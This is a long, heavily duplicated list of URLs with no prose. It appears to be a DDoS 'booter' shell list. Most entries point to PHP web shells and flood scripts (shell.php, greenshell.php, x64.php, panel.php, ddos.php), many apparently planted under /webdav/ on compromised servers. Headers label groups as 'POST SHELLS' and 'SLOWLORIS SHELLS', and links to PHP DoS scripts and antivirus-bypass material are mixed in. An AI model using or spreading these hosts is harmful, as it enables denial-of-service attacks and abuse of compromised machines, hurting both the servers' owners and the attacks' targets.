http://www.fahriozturk.tr.gg/111.htm?PHPSESSID=8e7467e5523dbf043564467b1fb9bcef/ http://firman-mannte.blogspot.com http://virusgamingz.roxorgamers.com http://mehdi4604.persiangig.com/vbulltien/ddos.php http://aldy.byethost2.com http://surrealesport.su.funpic.de/index.php?forum-privmsg-new=0&empfid=1 http://avatarmovieonline.110mb.com http://firman-mannte.blogspot.com/2011/04/packets-0-ip-post-rand-post.html http://link270.000space.com http://www.anarchistcookbook.com/showthread.php/33795-PHP-DoS-Script http://www.insert-forum.hostujem.sk http://pastebin.com/7qx7kust http://www.rocksecuritycams.741.com/ddos.html http://niyuavalon.webege.com/phpddos/control http://surrealesport.su.funpic.de http://ngoisaoblog.vn/DDOS.php http://www.hesoyam.website.org http://belsec.skynetblogs.be/archive/2010/05/19/next-getting-hacked-to-ddos-another-site-to-death-and-get-su.html http://tinypaste.com/e38333 http://www.anarchistcookbook.com/archive/index.php/t-33795.html? http://surrealesport.su.funpic.de/index.php?user-details-1 http://dinamo.com.nu/php http://dos123.uw.hu/index.php http://ngl-1.com/ http://lanzador.tupoeta.com/dos http://zoobooter.webs.com http://www.jinggai315.com/lys http://surrealesport.su.funpic.de/index.php?user-mail-1 http://surrealesport.su.funpic.de/index.php http://pastie.org/pastes/470709/reply http://fahriozturk.tr.gg/111.htm http://www.dinamo.com.nu/php http://blog-indonesia.com/blog-archive-5103-211.html http://www.fahriozturk.tr.gg/111.htm?PHP...b1fb9bcef http://ashiyane.org/forums/showthread.php?p=154364 http://arhack.net/vb/showthread.php?p=446937 http://46.166.148.63/shell.php http://www.fahriozturk.tr.gg/111.htm?PHP...b1fb9bcef/ http://62.82.102.40/webdav/sprint.php http://www.mylilygirl.com/photos/tpl_c/x.php http://taslargrup.com/templates/beez/server.php http://belakshell.50webs.com/index.php http://joomlaedge.com/upload/0x.php http://88.198.132.250/webdav/Emb.php http://114.112.49.8/webdav/Emb.php http://www.gfdgdfgfdgfd.co.cc/shell.php http://217.128.142.249/webdav/greenshell.php http://204.191.9.89/webdav/shell16182.php http://www.theresahackforthat.webs.com/shell.php http://www.ecofilms.gr/search_gr.asp?act=phptools&... http://theresahackforthat.webs.com/shell.php http://www.ecofilms.gr/search_gr.asp http://www.ecofilms.gr/search_gr.asp?act=phptools&.../ http://www.ecofilms.gr/search_gr.asp?act=phptools http://shells.red-pill.eu http://mapi.co.kr/zb41pl7/bbs/data/mapi_bbs/settings.php http://shells.red-pill.eu/ http://163.178.170.74/webdav/greenshell.php http://gfdgdfgfdgfd.co.cc/shell.php http://www.ecofilms.gr/search_gr.asp?act...ols&hos... http://tools.rosinstrument.com/proxy/?rule1 http://www.ecofilms.gr/search_gr.asp?act...ols http://67.174.216.22/webdav/sprint.php http://feeds2.feedburner.com/alivingtruth/DRwH/ http://66.240.176.132/webdav/sprint.php http://www.ecofilms.gr/search_gr.asp?act=phptools/ http://www.ecofilms.gr/search_gr.asp?act...ols&host=/ http://82.114.168.38/webdav/greenshell.php http://www.windowsecurity.com/faqs/Trojans/ http://www.offensive-security.com/metasploit-unleashed/Antivirus_Bypass http://82.114.168.38/webdav/greenshell.php?act=php... http://72.55.60.50/webdav/sprint.php http://00000.000a.de/PHP/ http://www.ecofilms.gr/search_gr.asp?&.../ http://www.indianethicalhacker.blackapplehost.com/xoep.php?act=phptools&host=/ http://69.162.116.106/webdav/sprint.php http://82.114.168.38/webdav/greenshell.php?act=phptools&host=/ http://www.sidarglobal.com/help.php http://indianethicalhacker.blackapplehost.com/xoep.php?act=phptools&host=/ http://203.153.230.78/webdav/config.php http://www.fahriozturk.tr.gg/111.htm http://www.team-crowplay.de/function.php http://www.fahriozturk.tr.gg/111.htm?PHP...b1fb9bcef http://d-dos.50webs.com/ddos.php http://zhan.liechesk.cn/hechihuagong.com.cn-domain http://www.fahriozturk.tr.gg/111.htm?PHPSESSID=8e7.../ http://www.1100f.com/member http://www.fahriozturk.tr.gg/111.htm?PHP...7b1fb9b.../ http://toutsourtous.anatoile.com/html.php?id_menu=3206841 http://www.jinggai315.com/lys/ http://d-dos.50webs.com/ddos.php http://toutsourtous.anatoile.com/html.php?id_menu=3206841 http://www.hesoyam.website.org/ http://feeds2.feedburner.com/alivingtruth/DRwH http://belakshell.50webs.com/index.php http://beacheater.blogspot.com/2011/01/php-dos.html http://feeds2.feedburner.com/alivingtruth/DRwH/ http://www.insert-forum.hostujem.sk/ http://www.dinamo.com.nu/php/ http://firman-mannte.blogspot.com/ http://www.1100f.com/member/ http://www.tux-planet.fr/public/hack/ddos/php-dos.phps http://niyuavalon.webege.com/phpddos/control/ http://tinypaste.com/e38333 http://dinamo.com.nu/php/ http://avatarmovieonline.110mb.com/ http://pulsar-tec.com/ http://toutsourtous.webobo.biz/html.php?id_menu=3336677 http://virusgamingz.roxorgamers.com/ http://www.fahriozturk.tr.gg/111.htm/ http://firman-mannte.blogspot.com/2011_04_01_archive.html http://www.fahriozturk.tr.gg/111.htm?PHP...b1fb9bcef/ http://pastie.org/pastes/1044528/download http://www.fahriozturk.tr.gg/111.htm?PHP...7b1fb9bcef/ http://www.fahriozturk.tr.gg/111.htm http://firman-mannte.blogspot.com/2011_04_01_archive.html http://odrp.eu.nu/index.php?page=ThreadsFeed&format=atom http://toutsourtous.anatoile.com/html.php?id_menu=3206841 http://00000.000a.de/PHP/ http://eq22.weebly.com/ http://www.fahriozturk.tr.gg/111.htm?PHPSESSID=8e7467e5523dbf043564467b1fb9bcef/ http://odrp.eu.nu/ http://zhan.liechesk.cn/hechihuagong.com.cn-domain http://www.fahriozturk.tr.gg/111.htm?PHP...7b1fb9b... http://pastie.org/pastes/1044528/download/ http://feeds2.feedburner.com/alivingtruth/DRwH/ http://odrp.eu.nu/index.php?action=BoardMarkAllAsRead&t=9acba20c952241e625770c058c7470f4dde2990c http://www.fahriozturk.tr.gg/111.htm http://www.fahriozturk.tr.gg/111.htm/ http://belakshell.50webs.com/index.php http://d-dos.50webs.com/ddos.php http://pastie.org/pastes/1044528/download/ http://www.fahriozturk.tr.gg/111.htm?PHP...7b1fb9bcef/ http://dos123.uw.hu/index.php http://zhan.liechesk.cn/hechihuagong.com.cn-domain http://toutsourtous.webobo.biz/html.php?id_menu=3336677 http://toutsourtous.webobo.com/html.php?id_menu=3336677 http://belsec.skynetblogs.be/post/7896874/next--getting-hacked-to-ddos-another-site-to- http://www.fahriozturk.tr.gg/111.htm?PHP...7b1fb9bcef http://fahriozturk.tr.gg/111.htm?PHP...7b1fb9bcef http://www.fahriozturk.tr.gg/111.htm?PHP.../index.php http://www.fahriozturk.tr.gg/111.htm?PHP...7b1fb9bcef/index.php http://feeds2.feedburner.com/alivingtruth/DRwH/ http://www.fahriozturk.tr.gg/111.htm http://www.dinamo.com.nu/php/ http://www.1100f.com/member/ http://belakshell.50webs.com/index.php http://pastie.org/pastes/1044528/download/ http://www.1100f.com/member/ http://www.dinamo.com.nu/php/ http://202.190.74.200/webdav/x32.php http://www.ecofilms.gr/search_gr.asp http://82.114.168.38/webdav/greenshell.php http://www.fahriozturk.tr.gg/111.htm/ http://feeds2.feedburner.com/alivingtruth/DRwH http://www.ecofilms.gr/search_gr.asp http://www.dinamo.com.nu/php/ http://feeds2.feedburner.com/alivingtruth/DRwH/ http://pastie.org/pastes/1044528/download/ http://www.1100f.com/member/ http://www.tux-planet.fr/public/hack/ddos/php-dos.phps http://belakshell.50webs.com/index.php http://www.fahriozturk.tr.gg/111.htm/ http://www.fahriozturk.tr.gg/111.htm?PHP...7b1fb9bcef/ http://toutsourtous.webobo.biz/html.php?id_menu=3336677 http://belakshell.50webs.com/index.php http://feeds2.feedburner.com/alivingtruth/DRwH http://www.ecofilms.gr/search_gr.asp http://www.ecofilms.gr/search_gr.asp http://www.theresahackforthat.webs.com/shell.php http://shells.red-pill.eu/ http://82.114.168.38/webdav/greenshell.php http://surrealesport.su.funpic.de/index.php?forum-privmsg-new=0&empfid=1 http://www.fahriozturk.tr.gg/111.htm http://www.team-crowplay.de/index.php http://feeds2.feedburner.com/alivingtruth/DRwH http://virusgamingz.roxorgamers.com/ http://www.ecofilms.gr/search_gr.asp http://shells.red-pill.eu/ http://feeds2.feedburner.com/alivingtruth/DRwH http://d-dos.50webs.com/ddos.php http://tinypaste.com/e38333 http://www.1100f.com/member/ http://www.ecofilms.gr/search_gr.asp http://shells.red-pill.eu/ http://d-dos.50webs.com/ddos.php http://d-dos.50webs.com/ddos.php http://www.fahriozturk.tr.gg/111.htm http://www.fahriozturk.tr.gg/111.htm?PHP...7b1fb9b... http://www.anarchistcookbook.com/showthread.php/33795-PHP-DoS-Script http://www.fahriozturk.tr.gg/111.htm?PHPSESSID=8e7... http://pastie.org/pastes/1044528/download/ http://toutsourtous.webobo.biz/html.php?id_menu=3336677 http://www.fahriozturk.tr.gg/111.htm/ http://www.fahriozturk.tr.gg/111.htm?PHP...7b1fb9bcef/ http://82.114.168.38/webdav/Pk.php http://feeds2.feedburner.com/alivingtruth/DRwH http://163.178.170.74/webdav/greenshell.php http://www.ecofilms.gr/search_gr.asp?act=phptools&... http://www.ecofilms.gr/search_gr.asp?act...ols&host=/ http://gfdgdfgfdgfd.co.cc/shell.php http://theresahackforthat.webs.com/shell.php http://shells.red-pill.eu http://204.191.9.89/webdav/shell16182.php http://www.indianethicalhacker.blackapplehost.com/xoep.php?act=phptools&host=/ http://www.indianethicalhacker.blackapplehost.com/xoep.php http://www.gfdgdfgfdgfd.co.cc/shell.php http://mapi.co.kr/zb41pl7/bbs/data/mapi_bbs/settings.php http://82.114.168.38/webdav/greenshell.php http://www.ecofilms.gr/search_gr.asp?act=phptools/ http://www.ecofilms.gr/search_gr.asp?act=phptools&.../ http://www.theresahackforthat.webs.com/shell.php http://shells.red-pill.eu/ http://www.fahriozturk.tr.gg/111.htm?PHP...7b1fb9bcef/ http://ngoisaoblog.vn/DDOS.php http://dinamo.com.nu/php/ http://www.fahriozturk.tr.gg/111.htm http://firman-mannte.blogspot.com/ http://firman-mannte.blogspot.com/2011_04_01_archive.html http://eq22.weebly.com/ http://niyuavalon.webege.com/phpddos/control/ http://aldy.byethost2.com/ http://www.fahriozturk.tr.gg/111.htm http://avatarmovieonline.110mb.com/ http://zhan.liechesk.cn/hechihuagong.com.cn-domain http://www.team-crowplay.de/function.php http://www.anarchistcookbook.com/showthread.php/33795-PHP http://fahriozturk.tr.gg/111.htm?PHP...7b1fb9bcef http://toutsourtous.anatoile.com/html.php?id_menu=3206841 http://d-dos.50webs.com/ddos.php http://beacheater.blogspot.com/2011/01/php-dos.html http://toutsourtous.webobo.biz/html.php?id_menu=3336677 http://feeds2.feedburner.com/alivingtruth/DRwH/ http://www.rocksecuritycams.741.com/ddos.html http://eq22.weebly.com/ http://www.1100f.com/member/ http://firman-mannte.blogspot.com/ http://www.anarchistcookbook.com/showthread.php/33795-PHP http://www.1100f.com/member/ http://d-dos.50webs.com/ddos.php http://toutsourtous.webobo.biz/html.php?id_menu=3336677 http://pastie.org/pastes/1044528/download/ http://www.fahriozturk.tr.gg/111.htm?PHP...7b1fb9bcef/ http://firman-mannte.blogspot.com/ http://www.anarchistcookbook.com/showthread.php/33795-PHP-DoS-Script http://pastie.org/pastes/1044528/download http://www.fahriozturk.tr.gg/111.htm/ http://firman-mannte.blogspot.com/2011_04_01_archive.html http://beacheater.blogspot.com/2011/01/php-dos.html http://www.tux-planet.fr/public/hack/ddos/php-dos.phps http://pastie.org/pastes/1044528/download http://beacheater.blogspot.com/2011/01/php-dos.html http://firman-mannte.blogspot.com/ http://pastie.org/pastes/1044528/download/ http://dinamo.com.nu/php/ http://www.ecofilms.gr/search_gr.asp http://www.tux-planet.fr/public/hack/ddos/php-dos.phps http://www.indianethicalhacker.blackapplehost.com/xoep.php http://82.114.168.38/webdav/greenshell.php?act=phptools&host=/ http://www.indianethicalhacker.blackapplehost.com/xoep.php?act=phptools&host=/ http://shells.red-pill.eu/ http://www.jinggai315.com/lys/ http://www.dinamo.com.nu/php/ http://www.corrado-club.ca/images/yummy.php http://www.selahservice.com/images/yummy.php http://belakshell.50webs.com/index.php http://www.insert-forum.hostujem.sk/ http://www.dinamo.com.nu/php/ http://beacheater.blogspot.com/2011/01/php-dos.html http://urmybest.110mb.com/phpdos.php http://virusgamingz.roxorgamers.com/ http://surrealesport.su.funpic.de/index.php?forum-privmsg-new=0&empfid=1 http://d-dos.50webs.com/ddos.php http://belakshell.50webs.com/index.php http://d-dos.50webs.com/ddos.php http://www.circlesofpeace.us/news/images/yummy.php http://feeds2.feedburner.com/alivingtruth/DRwH http://www.anarchistcookbook.com/showthread.php/33795-PHP-DoS-Script http://dos123.uw.hu/index.php http://odrp.eu.nu/index.php?page=ThreadsFeed&format=atom http://pastie.org/pastes/1044528/download http://yogeshmehra1987.110mb.com/index.php http://200.140.145.29/webdav/get.php http://belakshell.50webs.com/index.php http://202.190.74.200/webdav/x32.php http://yogeshmehra1987.110mb.com/index.php http://pastie.org/pastes/1044528/download/ http://204.191.9.89/webdav/shell16182.php http://ngoisaoblog.vn/DDOS.php http://odrp.eu.nu/index.php?action=BoardMarkAllAsRead&t=9acba20c952241e625770c058c7470f4dde2990c http://hesoyam.website.org/ http://217.6.136.144/webdav/greenshell.php http://217.6.136.144/webdav/greenshell.php http://odrp.eu.nu/ http://colla.cr4ck.ru/s/ http://feeds2.feedburner.com/alivingtruth/DRwH/ http://beacheater.blogspot.com/2011/01/php-dos.html http://belakshell.50webs.com/index.php http://www.braille-house.com/components/out/ http://mehdi4604.persiangig.com/vbulltien/ddos.php http://d-dos.50webs.com/ddos.php http://niyuavalon.webege.com/phpddos/control/ http://eq22.weebly.com/ http://fahriozturk.tr.gg/111.htm?PHP...7b1fb9bcef http://feeds2.feedburner.com/alivingtruth/DRwH http://firman-mannte.blogspot.com/ http://gfdgdfgfdgfd.co.cc/shell.php http://indianethicalhacker.blackapplehost.com/xoep.php http://feeds2.feedburner.com/alivingtruth/DRwH/ http://mapi.co.kr/zb41pl7/bbs/data/mapi_bbs/settings.php http://mmx1.webs.com/shell.php http://d-dos.50webs.com/ddos.php http://pastie.org/pastes/1044528/download http://pickme.3x.ro/uploads/cyber.php http://mehdi4604.persiangig.com/vbulltien/ddos.php http://www.team-crowplay.de/ http://rahmat.tv/mount/php-dos-coded-by-exe.htm http://shells.red-pill.eu http://sockslist.net/proxy/server-socks-hide-ip-address/2#proxylist http://team-crowplay.de/ http://theresahackforthat.webs.com/shell.php http://tools.rosinstrument.com/proxy/?rule1 http://toutsourtous.anatoile.com/html.php?id_menu=3206841 http://eq22.weebly.com/ http://urmybest.110mb.com/phpdos.php http://www.anarchistcookbook.com/showthread.php/33795-PHP http://www.rocksecuritycams.741.com/ddos.html http://www.fahriozturk.tr.gg/111.htm?PHPSESSID=8e7467e5523dbf043564467b1fb9bcef/ http://www.anarchistcookbook.com/showthread.php/33795-PHP http://www.dinamo.com.nu/php/ http://www.ecofilms.gr/search_gr.asp http://www.fahriozturk.tr.gg/111.htm http://www.gfdgdfgfdgfd.co.cc/shell.php http://www.indianethicalhacker.blackapplehost.com/xoep.php http://www.sidarglobal.com/help.php http://www.sidarglobal.com/help.php http://www.team-crowplay.de/ http://www.theresahackforthat.webs.com/shell.php http://www.tux-planet.fr/public/hack/ddos/php-dos.phps http://200.69.105.206/webdav/sprint.php http://feeds2.feedburner.com/alivingtruth/DRwH http://yogeshmehra1987.110mb.com/index.php http://zhan.liechesk.cn/hechihuagong.com.cn-domain http://190.144.174.250/webdav/greenshell.php http://194.110.192.121/xmlrpc/includes/shell.php http://195.15.2.83/webdav/panel.php http://198.104.131.210/webdav/panel.php http://24.155.184.77/webdav/panel.php http://212.182.69.18/webdav/panel.php http://190.96.251.200/webdav/x64.php http://201.131.19.132/webdav/greenshell.php http://189.254.218.34/webdav/greenshell.php http://190.145.105.118/webdav/toxic2.php http://190.145.105.118/webdav/toxic3.php http://190.145.105.118/webdav/toxic5.php http://81.223.64.3/webdav/greenshell.php http://190.145.105.118/webdav/toxic.php http://217.6.136.144/webdav/greenshell.php http://190.145.105.118/webdav/toxic4.php http://190.145.105.118/webdav/toxic9.php http://140.127.52.24/webdav/greenshell.php http://190.145.105.118/webdav/toxic7.php http://190.145.105.118/webdav/toxic6.php http://89.104.195.200/webdav/x32.php http://190.145.105.118/webdav/toxic10.php http://87.103.134.31/webdav/x32.php http://112.201.103.203/webdav/panel.php http://114.142.147.125/webdav/shell.php http://203.197.246.13/webdav/panel.php http://200.80.8.198/webdav/mouss.php http://200.80.8.198/webdav/greenshell.php http://187.45.112.32/webdav/x64.php http://125.21.85.66/webdav/greenshell.php http://reckon.megabyet.net/index.php http://b00tles.megabyet.net/index.php http://reckon.megabyet.net/ http://urmybest.110mb.com/phpdos.php http://belakshell.50webs.com/index.php http://111.67.195.8/webdav/panel.php http://161.58.93.18/webdav/panel.php http://190.103.101.170/webdav/x64.php http://beans.tv/ulogs.php http://nksoft.de/ulogs.php http://mirllc.com/ulogs.php http://69.13.40.82/webdav/x32.php http://ma77o.info/shell/77shell/shell.php http://190.145.105.118/webdav/toxic1.php http://190.145.105.118/webdav/toxic8.php http://134.68.158.28/webdav/shell.php http://58.26.6.92/webdav/form.php http://www.inchoates.com/smf/index.php http://shells.red-pill.eu/ http://d-dos.50webs.com/ddos.php http://yogeshmehra1987.110mb.com/index.php http://www.hexagonholdings.com/Portals/0/11.php http://armavir-shop.ru/inde.php http://www.fahriozturk.tr.gg/111.htm http://www.1100f.com/member/index.php http://sxleton.awardspace.us/index.php http://93.17.7.149/webdav/shell.php http://61.129.51.224/webdav/panel.php http://178.77.68.206/webdav/x32.php http://212.85.40.233/webdav/x64.php http://187.46.80.196/webdav/x64.php http://187.52.105.162/webdav/x64.php http://212.85.40.233/webdav/x32.php http://46.2.46.140/webdav/x64.php http://190.92.6.237/webdav/x64.php http://190.101.102.71/webdav/x64.php http://190.103.235.12/webdav/x64.php http://178.77.68.206/webdav/x64.php http://187.59.52.138/webdav/x64.php http://201.51.246.185/webdav/x64.php http://201.86.171.71/webdav/x64.php http://95.82.248.96/webdav/_x64.php http://187.54.177.172/webdav/x64.php http://201.77.115.131/webdav/x64.php http://190.94.112.32/webdav/x64.php http://202.196.33.153/webdav/greenshell.php http://46.0.85.27/webdav/x64.php http://190.95.231.66/webdav/x64.php http://190.101.125.117/webdav/x64.php http://95.9.105.33/webdav/ulogs.php http://85.183.88.7/webdav/greenshell.php http://65.89.135.254/webdav/panel.php http://147.96.144.90/webdav/greenshell.php http://190.244.29.113/webdav/panel.php http://124.155.211.235/webdav/x32.php http://190.24.133.205/webdav/form.php http://221.116.9.29/webdav/panel.php http://122.183.217.136/webdav/greenshell.php http://72.0.34.195/webdav/greenshell.php http://97.104.27.168/webdav/ulogs.php http://76.160.223.161/webdav/greenshell.php http://207.191.208.144/webdav/greenshell.php http://60.240.232.232/webdav/shell.php http://91.113.215.58/webdav/shell.php http://91.114.11.122/webdav/shell.php http://81.255.199.42/webdav/mouss.php http://66.255.37.124/webdav/shell.php http://220.245.100.87/webdav/shell.php http://203.10.47.149/webdav/mouss.php http://213.33.48.202/webdav/shell.php http://85.25.16.170/webdav/x32.php http://91.121.166.14/webdav/x32.php http://91.121.100.84/webdav/x32.php http://65.52.34.176/webdav/form.php http://190.216.51.80/webdav/form.php http://93.108.190.239/webdav/form.php http://203.97.107.214/webdav/x32.php http://132.248.52.174/webdav/panel.php http://82.112.32.42/webdav/x32.php http://140.133.6.59/webdav/form.php http://219.75.241.125/webdav/form.php http://148.160.170.108/webdav/panel.php http://189.205.253.104/webdav/panel.php http://178.124.148.32/webdav/panel.php http://120.105.97.7/webdav/panel.php http://112.207.146.238/webdav/panel.php http://110.138.183.143/webdav/panel.php http://190.66.25.27/webdav/panel.php http://200.140.145.29/webdav/panel.php http://201.228.144.124/webdav/panel.php http://122.165.52.189/webdav/panel.php http://140.115.80.111/webdav/panel.php http://202.129.207.194/webdav/panel.php http://69.143.28.40/webdav/panel.php http://82.212.128.142/webdav/panel.php http://140.127.32.86/webdav/panel.php http://71.184.200.8/webdav/panel.php http://130.179.30.237/webdav/panel.php http://88.26.206.142/webdav/panel.php http://150.146.34.11/webdav/panel.php http://194.141.64.138/webdav/panel.php http://122.49.77.59/webdav/panel.php http://120.127.14.41/webdav/greenshell.php http://66.71.191.93/webdav/panel.php http://217.41.23.194/webdav/panel.php http://58.214.243.158/webdav/toxic2.php http://174.127.45.194/webdav/panel.php http://93.17.7.149/webdav/greenshell.php http://150.254.77.190/webdav/greenshell.php http://140.126.130.205/webdav/panel.php http://93.17.7.151/webdav/shell.php http://93.17.7.150/webdav/greenshell.php http://93.17.7.148/webdav/greenshell.php http://monederocfe.com/webdav/x32.php http://82.127.64.56/webdav/shell.php http://82.127.64.56/webdav/greenshell.php http://24.155.184.77/webdav/panel.php http://b00tles.megabyet.net/index.php http://reckon.megabyet.net/index.php http://190.144.174.250/webdav/greenshell.php http://reckon.megabyet.net/ http://194.110.192.121/xmlrpc/includes/shell.php http://201.131.19.132/webdav/greenshell.php http://212.182.69.18/webdav/panel.php http://134.68.158.28/webdav/shell.php http://190.96.251.200/webdav/x64.php http://89.104.195.200/webdav/x32.php http://189.254.218.34/webdav/greenshell.php http://217.6.136.144/webdav/greenshell.php http://200.80.8.198/webdav/mouss.php http://200.80.8.198/webdav/greenshell.php http://93.17.7.150/webdav/greenshell.php http://140.127.52.24/webdav/greenshell.php http://187.45.112.32/webdav/x64.php http://93.17.7.148/webdav/greenshell.php http://112.201.103.203/webdav/panel.php http://114.142.147.125/webdav/shell.php http://87.103.134.31/webdav/x32.php http://82.127.64.56/webdav/shell.php http://93.17.7.149/webdav/shell.php http://125.21.85.66/webdav/greenshell.php http://203.197.246.13/webdav/panel.php http://82.127.64.56/webdav/greenshell.php http://93.17.7.151/webdav/shell.php http://93.17.7.149/webdav/greenshell.php http://58.26.6.92/webdav/form.php http://81.223.64.3/webdav/greenshell.php http://urmybest.110mb.com/phpdos.php http://111.67.195.8/webdav/panel.php http://yogeshmehra1987.110mb.com/index.php http://belakshell.50webs.com/index.php http://d-dos.50webs.com/ddos.php http://nksoft.de/ulogs.php http://beans.tv/ulogs.php http://mirllc.com/ulogs.php http://www.inchoates.com/smf/index.php http://ma77o.info/shell/77shell/shell.php http://61.129.51.224/webdav/panel.php http://shells.red-pill.eu/ http://armavir-shop.ru/inde.php http://www.fahriozturk.tr.gg/111.htm http://sxleton.awardspace.us/index.php http://www.hexagonholdings.com/Portals/0/11.php http://190.103.101.170/webdav/x64.php http://69.13.40.82/webdav/x32.php http://198.104.131.210/webdav/panel.php http://161.58.93.18/webdav/panel.php http://www.1100f.com/member/index.php http://190.145.105.118/webdav/toxic8.php http://190.145.105.118/webdav/toxic9.php http://190.145.105.118/webdav/toxic1.php http://190.145.105.118/webdav/toxic2.php http://190.145.105.118/webdav/toxic6.php http://190.145.105.118/webdav/toxic.php http://190.145.105.118/webdav/toxic10.php http://190.145.105.118/webdav/toxic4.php http://190.145.105.118/webdav/toxic5.php http://190.145.105.118/webdav/toxic7.php http://190.145.105.118/webdav/toxic3.php http://174.127.45.194/webdav/panel.php http://195.15.2.83/webdav/panel.php http://187.46.80.196/webdav/x64.php http://187.52.105.162/webdav/x64.php http://187.59.52.138/webdav/x64.php http://202.196.33.153/webdav/greenshell.php http://190.95.231.66/webdav/x64.php http://46.2.46.140/webdav/x64.php http://190.92.6.237/webdav/x64.php http://201.86.171.71/webdav/x64.php http://187.54.177.172/webdav/x64.php http://190.94.112.32/webdav/x64.php http://178.77.68.206/webdav/x32.php http://212.85.40.233/webdav/x32.php http://212.85.40.233/webdav/x64.php http://190.103.235.12/webdav/x64.php http://178.77.68.206/webdav/x64.php http://201.51.246.185/webdav/x64.php http://95.82.248.96/webdav/_x64.php http://201.77.115.131/webdav/x64.php http://46.0.85.27/webdav/x64.php http://65.89.135.254/webdav/panel.php http://147.96.144.90/webdav/greenshell.php http://122.183.217.136/webdav/greenshell.php http://97.104.27.168/webdav/ulogs.php http://207.191.208.144/webdav/greenshell.php http://91.114.11.122/webdav/shell.php http://66.255.37.124/webdav/shell.php http://213.33.48.202/webdav/shell.php http://93.108.190.239/webdav/form.php http://190.244.29.113/webdav/panel.php http://60.240.232.232/webdav/shell.php http://91.121.100.84/webdav/x32.php http://82.112.32.42/webdav/x32.php http://189.205.253.104/webdav/panel.php http://178.124.148.32/webdav/panel.php http://120.105.97.7/webdav/panel.php http://221.116.9.29/webdav/panel.php http://72.0.34.195/webdav/greenshell.php http://76.160.223.161/webdav/greenshell.php http://91.113.215.58/webdav/shell.php http://203.10.47.149/webdav/mouss.php http://85.25.16.170/webdav/x32.php http://65.52.34.176/webdav/form.php http://190.216.51.80/webdav/form.php http://203.97.107.214/webdav/x32.php http://140.133.6.59/webdav/form.php http://219.75.241.125/webdav/form.php http://190.101.125.117/webdav/x64.php http://95.9.105.33/webdav/ulogs.php http://85.183.88.7/webdav/greenshell.php http://124.155.211.235/webdav/x32.php http://190.24.133.205/webdav/form.php http://81.255.199.42/webdav/mouss.php http://220.245.100.87/webdav/shell.php http://91.121.166.14/webdav/x32.php http://132.248.52.174/webdav/panel.php http://148.160.170.108/webdav/panel.php http://190.66.25.27/webdav/panel.php http://200.140.145.29/webdav/panel.php http://140.115.80.111/webdav/panel.php http://82.212.128.142/webdav/panel.php http://122.49.77.59/webdav/panel.php http://217.41.23.194/webdav/panel.php http://110.138.183.143/webdav/panel.php http://88.26.206.142/webdav/panel.php http://150.146.34.11/webdav/panel.php http://194.141.64.138/webdav/panel.php http://201.228.144.124/webdav/panel.php http://122.165.52.189/webdav/panel.php http://69.143.28.40/webdav/panel.php http://140.127.32.86/webdav/panel.php http://71.184.200.8/webdav/panel.php http://130.179.30.237/webdav/panel.php http://112.207.146.238/webdav/panel.php http://202.129.207.194/webdav/panel.php http://66.71.191.93/webdav/panel.php http://150.254.77.190/webdav/greenshell.php http://140.126.130.205/webdav/panel.php http://120.127.14.41/webdav/greenshell.php http://monederocfe.com/webdav/x32.php === POST SHELLS == http://d-dos.50webs.com/ddos.php http://toutsourtous.webobo.biz/html.php?id_menu=3336677 http://feeds2.feedburner.com/alivingtruth/DRwH http://163.178.170.74/webdav/greenshell.php http://feeds2.feedburner.com/alivingtruth/DRwH http://d-dos.50webs.com/ddos.php http://www.ecofilms.gr/search_gr.asp http://218.87.136.9/webdav/config.php http://shells.red-pill.eu/ http://82.114.168.38/webdav/greenshell.php http://www.indianethicalhacker.blackapplehost.com/xoep.php http://theresahackforthat.webs.com/shell.php http://163.178.170.74/webdav/greenshell.php http://gfdgdfgfdgfd.co.cc/shell.php http://www.theresahackforthat.webs.com/shell.php http://indianethicalhacker.blackapplehost.com/xoep.php?act=phptools&host=/ http://mmx1.webs.com/shell.php http://d-dos.50webs.com/ddos.php http://belakshell.50webs.com/index.php http://feeds2.feedburner.com/alivingtruth/DRwH/ http://firman-mannte.blogspot.com/ http://www.1100f.com/member/ http://www.tux-planet.fr/public/hack/ddos/php-dos.phps http://feeds2.feedburner.com/alivingtruth/DRwH http://www.dinamo.com.nu/php/ http://www.fahriozturk.tr.gg/111.htm/ http://pastie.org/pastes/1044528/download/ http://www.fahriozturk.tr.gg/111.htm?PHP...7b1fb9bcef/ http://www.fahriozturk.tr.gg/111.htm http://www.fahriozturk.tr.gg/111.htm?PHP...7b1fb9bcef http://www.fahriozturk.tr.gg/111.htm?PHP...7b1fb9b... http://www.anarchistcookbook.com/showthread.php/33795-PHP-DoS-Script http://www.fahriozturk.tr.gg/111.htm?PHPSESSID=8e7... http://toutsourtous.webobo.biz/html.php?id_menu=3336677 http://fahriozturk.tr.gg/111.htm?PHP...7b1fb9bcef http://pastie.org/pastes/1044528/download http://beacheater.blogspot.com/2011/01/php-dos.html http://aldy.byethost2.com/ http://avatarmovieonline.110mb.com/ http://mehdi4604.persiangig.com/vbulltien/ddos.php http://dinamo.com.nu/php/ http://niyuavalon.webege.com/phpddos/control/ http://ngoisaoblog.vn/DDOS.php http://pulsar-tec.com/ http://tinypaste.com/e38333 http://www.fahriozturk.tr.gg/111.htm?PHP...7b1fb9bcef/index.php http://surrealesport.su.funpic.de/index.php?forum-privmsg-new=0&empfid=1 http://virusgamingz.roxorgamers.com/ http://theresahackforthat.webs.com/shell.php http://shells.red-pill.eu/ http://www.ecofilms.gr/search_gr.asp http://202.190.74.200/webdav/x32.php http://203.153.230.78/webdav/config.php http://82.114.168.38/webdav/greenshell.php http://217.128.142.249/webdav/greenshell.php http://163.178.170.74/webdav/greenshell.php http://204.191.9.89/webdav/shell16182.php http://indianethicalhacker.blackapplehost.com/xoep.php?act=phptools&host=/ http://www.theresahackforthat.webs.com/shell.php http://www.ecofilms.gr/search_gr.asp?act=phptools&.../ http://82.114.168.38/webdav/greenshell.php?act=phptools&host=/ http://mmx2.webs.com/shell.php http://www.ecofilms.gr/search_gr.asp?act=phptools/ http://www.gfdgdfgfdgfd.co.cc/shell.php http://82.114.168.38/webdav/greenshell.php?act=php... http://mmx1.webs.com/shell.php http://www.windowsecurity.com/faqs/Trojans/ http://www.offensive-security.com/metasploit-unleashed/Antivirus_Bypass http://www.ecofilms.gr/search_gr.asp?act...ols http://shells.red-pill.eu http://www.ecofilms.gr/search_gr.asp?act=phptools http://www.ecofilms.gr/search_gr.asp?act...ols&hos... http://tools.rosinstrument.com/proxy/?rule1 http://www.ecofilms.gr/search_gr.asp?act=phptools&... http://alone-pri.tk/web.php === SLOWLORIS SHELLS == http://d-dos.50webs.com/ddos.php http://feeds2.feedburner.com/alivingtruth/DRwH http://belakshell.50webs.com/index.php http://beacheater.blogspot.com/2011/01/php-dos.html http://feeds2.feedburner.com/alivingtruth/DRwH/ 